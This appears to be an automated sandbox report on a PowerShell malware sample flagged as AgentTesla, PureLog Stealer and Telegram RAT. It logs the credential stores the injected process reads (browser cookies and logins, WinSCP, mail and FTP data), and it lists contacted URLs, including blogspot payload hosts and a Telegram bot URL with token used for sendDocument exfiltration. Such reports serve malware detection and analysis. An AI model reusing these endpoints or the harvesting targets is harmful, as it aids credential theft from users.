Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match

File source: 00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match

File source: 00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	31 Registry Run Keys / Startup Folder	211 Process Injection	1 Obfuscated Files or Information	1 Credentials in Registry	35 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	31 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	11 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	161 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	161 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
o3KyzpE7F4.ps1	5%	ReversingLabs

Source	Detection	Scanner	Label	Link
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.microsoft	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://minecap4-22-24.blogspot.	0%	Avira URL Cloud	safe
http://pubsubhubbub.appspot.com/	0%	Avira URL Cloud	safe
http://www.georss.org/georss	0%	Avira URL Cloud	safe
http://pubsubhubbub.appspot.com/	0%	Virustotal		Browse
http://www.georss.org/georss	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blogspot.l.googleusercontent.com	142.251.15.132	true	false		high
api.ipify.org	172.67.74.152	true	false		high
ip-api.com	208.95.112.1	true	false		high
api.telegram.org	149.154.167.220	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
minecap4-22-24.blogspot.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
http://minecap4-22-24.blogspot.com/haha	false	high
https://minecap4-22-24.blogspot.com/haha	false	high
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument	false	high
https://api.ipify.org/	false	high
https://minecap4-22-24.blogspot.com/atom.xml	false	high
http://ip-api.com/line/?fields=hosting	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom	powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000017.00000002.2534722701.0000028E2B315000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000012.00000003.2335885953.00000235C65F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr	false		high
http://pubsubhubbub.appspot.com/	powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org	RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	false		high
